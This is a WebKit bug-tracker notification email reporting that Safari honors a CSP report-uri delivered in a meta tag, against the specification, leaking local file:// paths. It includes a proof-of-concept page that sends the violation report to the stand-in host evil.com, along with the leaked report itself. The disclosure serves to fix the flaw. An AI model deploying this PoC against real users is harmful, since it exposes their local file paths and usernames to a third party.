<html>
    <head>
      <base href="https://bugs.webkit.org/" />
    </head>
    <body><table border="1" cellspacing="0" cellpadding="8">
        <tr>
          <th>Bug ID</th>
          <td><a class="bz_bug_link 
          bz_status_NEW "
   title="NEW - CSP: report-uri is honored even if CSP is served via &lt;meta&gt; tag, leaking full file:// paths as document-uri"
   href="https://bugs.webkit.org/show_bug.cgi?id=158263">158263</a>
          </td>
        </tr>

        <tr>
          <th>Summary</th>
          <td>CSP: report-uri is honored even if CSP is served via &lt;meta&gt; tag, leaking full file:// paths as document-uri
          </td>
        </tr>

        <tr>
          <th>Classification</th>
          <td>Unclassified
          </td>
        </tr>

        <tr>
          <th>Product</th>
          <td>WebKit
          </td>
        </tr>

        <tr>
          <th>Version</th>
          <td>WebKit Local Build
          </td>
        </tr>

        <tr>
          <th>Hardware</th>
          <td>Unspecified
          </td>
        </tr>

        <tr>
          <th>OS</th>
          <td>OS X 10.11
          </td>
        </tr>

        <tr>
          <th>Status</th>
          <td>NEW
          </td>
        </tr>

        <tr>
          <th>Severity</th>
          <td>Normal
          </td>
        </tr>

        <tr>
          <th>Priority</th>
          <td>P2
          </td>
        </tr>

        <tr>
          <th>Component</th>
          <td>WebCore Misc.
          </td>
        </tr>

        <tr>
          <th>Assignee</th>
          <td>webkit-unassigned&#64;lists.webkit.org
          </td>
        </tr>

        <tr>
          <th>Reporter</th>
          <td>mikispag&#64;gmail.com
          </td>
        </tr></table>
      <p>
        <div>
        <pre>Safari leaks the full file:// path in document-uri if a report-uri is in a CSP served via &lt;meta&gt; tag, even if the specification explicitly prohibits to honor report-uri if the policy is served via &lt;meta&gt; tag[1].

PoC:

report-uri.html
----------------

&lt;!DOCTYPE html&gt;
&lt;html&gt;
  &lt;head&gt;
    &lt;meta http-equiv=&quot;Content-Security-Policy&quot; content=&quot;img-src 'none'; report-uri <a href="https://evil.com/csp">https://evil.com/csp</a>&quot;&gt;
    &lt;title&gt;CSP report-uri demo&lt;/title&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;img src=&quot;cat.jpg&quot; alt=&quot;A nice cat&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;

This is the report sent to a remote report-uri:

{&quot;csp-report&quot;:{&quot;document-uri&quot;:&quot;file:///Users/mikispag/CSP/report-uri.html&quot;,&quot;referrer&quot;:&quot;&quot;,&quot;violated-directive&quot;:&quot;img-src 'none'&quot;,&quot;original-policy&quot;:&quot;img-src 'none'; report-uri <a href="https://evil.com/csp">https://evil.com/csp</a>&quot;,&quot;blocked-uri&quot;:&quot;file&quot;}}

[1] <a href="https://www.w3.org/TR/CSP2/#directive-report-uri">https://www.w3.org/TR/CSP2/#directive-report-uri</a></pre>
        </div>
      </p>
      <hr>
      <span>You are receiving this mail because:</span>
      
      <ul>
          <li>You are the assignee for the bug.</li>
      </ul>
    </body>
</html>